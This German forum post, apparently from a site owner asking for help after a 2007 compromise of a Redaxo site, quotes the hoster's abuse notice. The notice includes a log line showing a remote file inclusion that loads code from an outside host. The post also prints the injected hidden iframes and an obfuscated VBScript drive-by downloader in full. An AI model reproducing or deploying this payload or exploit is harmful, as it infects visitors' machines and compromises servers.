Und siehe da, ein kurzer Blick in den Quelltext der Seite hat klargemacht dass es kein Spam war. Da stand doch tatsächlich ganz unten nach dem schliessenden </html>-tag folgendes drin:Betreff: C81403328 Crackversuch ueber xxxxxx.de
Sehr geehrter Herr,
wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.
Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu
überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.
Es handelt sich um das Script
"/redaxo/include/addons/image_resize/pages/index.inc.php", welches über
den Parameter "REX[INCLUDE_PATH]" die Ausführung beliebigen Codes
erlaubt.
83.170.96.156 - - [12/Sep/2007:19:56:33 +0200] "GET
/redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH
]=http://usuarios.arnet.com.ar/larry123/morgan.txt? HTTP/1.1" 200 213
www.xxxxxxxxx.de "-" "Mozilla/3.0 (compatible; Indy Library)" "-"
Bitte beachten Sie, dass einige Ihrer Dateien mittels eines IFRAME
trojanisiert wurden. Bei Besuchern Ihrer Seiten, die unsichere
Webbrowser verwenden, soll so Schadcode installiert werden. Aus diesem
Grund empfehlen wir Ihnen, Ihre Dateien zu entfernen und von sicherer
Quelle erneut Hochzuladen.
Wir empfehlen Ihnen sich regelmäßig über Updates aller installierten
Software zu informieren, z.B. über entsprechende Announce-Mailinglisten
oder Foren des Herstellers. Insbesondere gilt dies auch für die
Komponenten von Drittherstellern der verwendeten Applikationen. Diese
sind mittlerweile ein gängiges Angriffsziel. Es werden mit Updates
teilweise auch Lücken geschlossen, die nicht in den Release-Notes der
Software verzeichnet sind. Verwenden Sie lediglich Programme aus
vertrauenswürdigen Quellen.
Falls Sie selbstgeschriebene Scripte einsetzen, dann dürfte folgender
Artikel ebenfalls von Interesse für Sie sein:
http://hilfe-center.1und1.de/server/roo ... ity/4.html
--
Mit freundlichen Grüßen,
Ingvar Gilbert
1&1 WebHosting
1&1 Internet AG
Brauerstraße 48
76135 Karlsruhe
Code: Alles auswählen
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
Code: Alles auswählen
<SCRIPT LANGUAGE="VBS"><!--
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9# (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8# =0tdsjqu"
s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s
--></SCRIPT>
es lag ncoh eine "php.ini" in addons/image_resize/pages/php.ini die hat da wohl auch nciht hingehört. löschen ging, runterladen aber nciht, um zu schauen was da drin war. ich hab von allem mal einen screenshot gemacht und den quelltext behalten.
kann uns jemand sagen, was oder wer das war? Wir sind bisher nochnie "gehackt" worden und nun ein wenig aufgeregt bzw verunsichert
.
danke schonmal